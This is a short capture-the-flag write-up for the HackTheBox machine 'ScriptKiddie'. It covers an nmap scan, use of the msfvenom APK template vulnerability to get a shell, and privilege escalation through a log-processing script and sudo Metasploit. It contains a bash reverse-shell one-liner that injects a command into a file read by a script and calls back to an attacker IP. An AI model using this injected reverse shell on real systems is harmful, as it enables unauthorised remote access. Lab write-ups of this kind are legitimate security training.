# HackTheBox-Script Kiddie ## NMAP ``` Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-02 19:59 PKT Stats: 0:00:17 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 99.63% done; ETC: 19:59 (0:00:00 remaining) Nmap scan report for 10.10.10.226 Host is up (0.21s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 4444/tcp open krb524? | fingerprint-strings: | GetRequest, NULL: | eNrsvWmXIjmSKPo9fwVddXsCiqhgc3AnTmXNEOz7vmbncHwDHHwB31i66/32J/kq34DIqntn7pmbfboCl0wmk8lkMkkm089/S2mKnKI4MXW8qjtJ/MIJR0lWYyCFVGiOs79piWHt35Ji/z rypLqRZMH+lkmRkdwvp4TC8iytOl8SfWDdL1XWkDyNOsoSzSpOHcrV+anuZJZkOHHrJ 5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5) |_http-server-header: Werkzeug/0.16.1 Python/3.8.5 |_http-title: k1d'5 h4ck3r t00l5 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.45 seconds ``` ## PORT 5000 (HTTP) Here we can do an nmap scan on the machine but if we try to run bash commands it won't work Similarly with the msfvenom and searchsploit Msfvenom successfully generetes payload But only windows and android payload generates Also there weren't any hidden directories or files on the webserver this page was only there on the machine. So on googling a little bit I found that `msfvenom` recently had a vulnerability in the process generating payload This was a latest exploit so metasploit needs to be update if you run to any issues when updating metasploit regarding the gem file do this inorder `gem update` `cd /usr/share/metasploit-framework` `sudo nano Gemfile.lock` (update reline version in that file this important before bundle install) `sudo bundle install` ( in metasploit folder) Upload the apk file on the website And you'll get a shell so we will need to stabilize it Going to `pwn`'s home directory we see a bash script `scanlosers.sh` which was reading a script file from `kid`'s home directory and execute it Seeing that file belongs to `pwn`'s group We can edit this with a bash reverse shell , this is the way the payload needs to be crafted. `echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.126/1337 0>&1' #" >> hackers` Doing `sudo -l` Running metasploit as `sudo` We can now run commands as `root`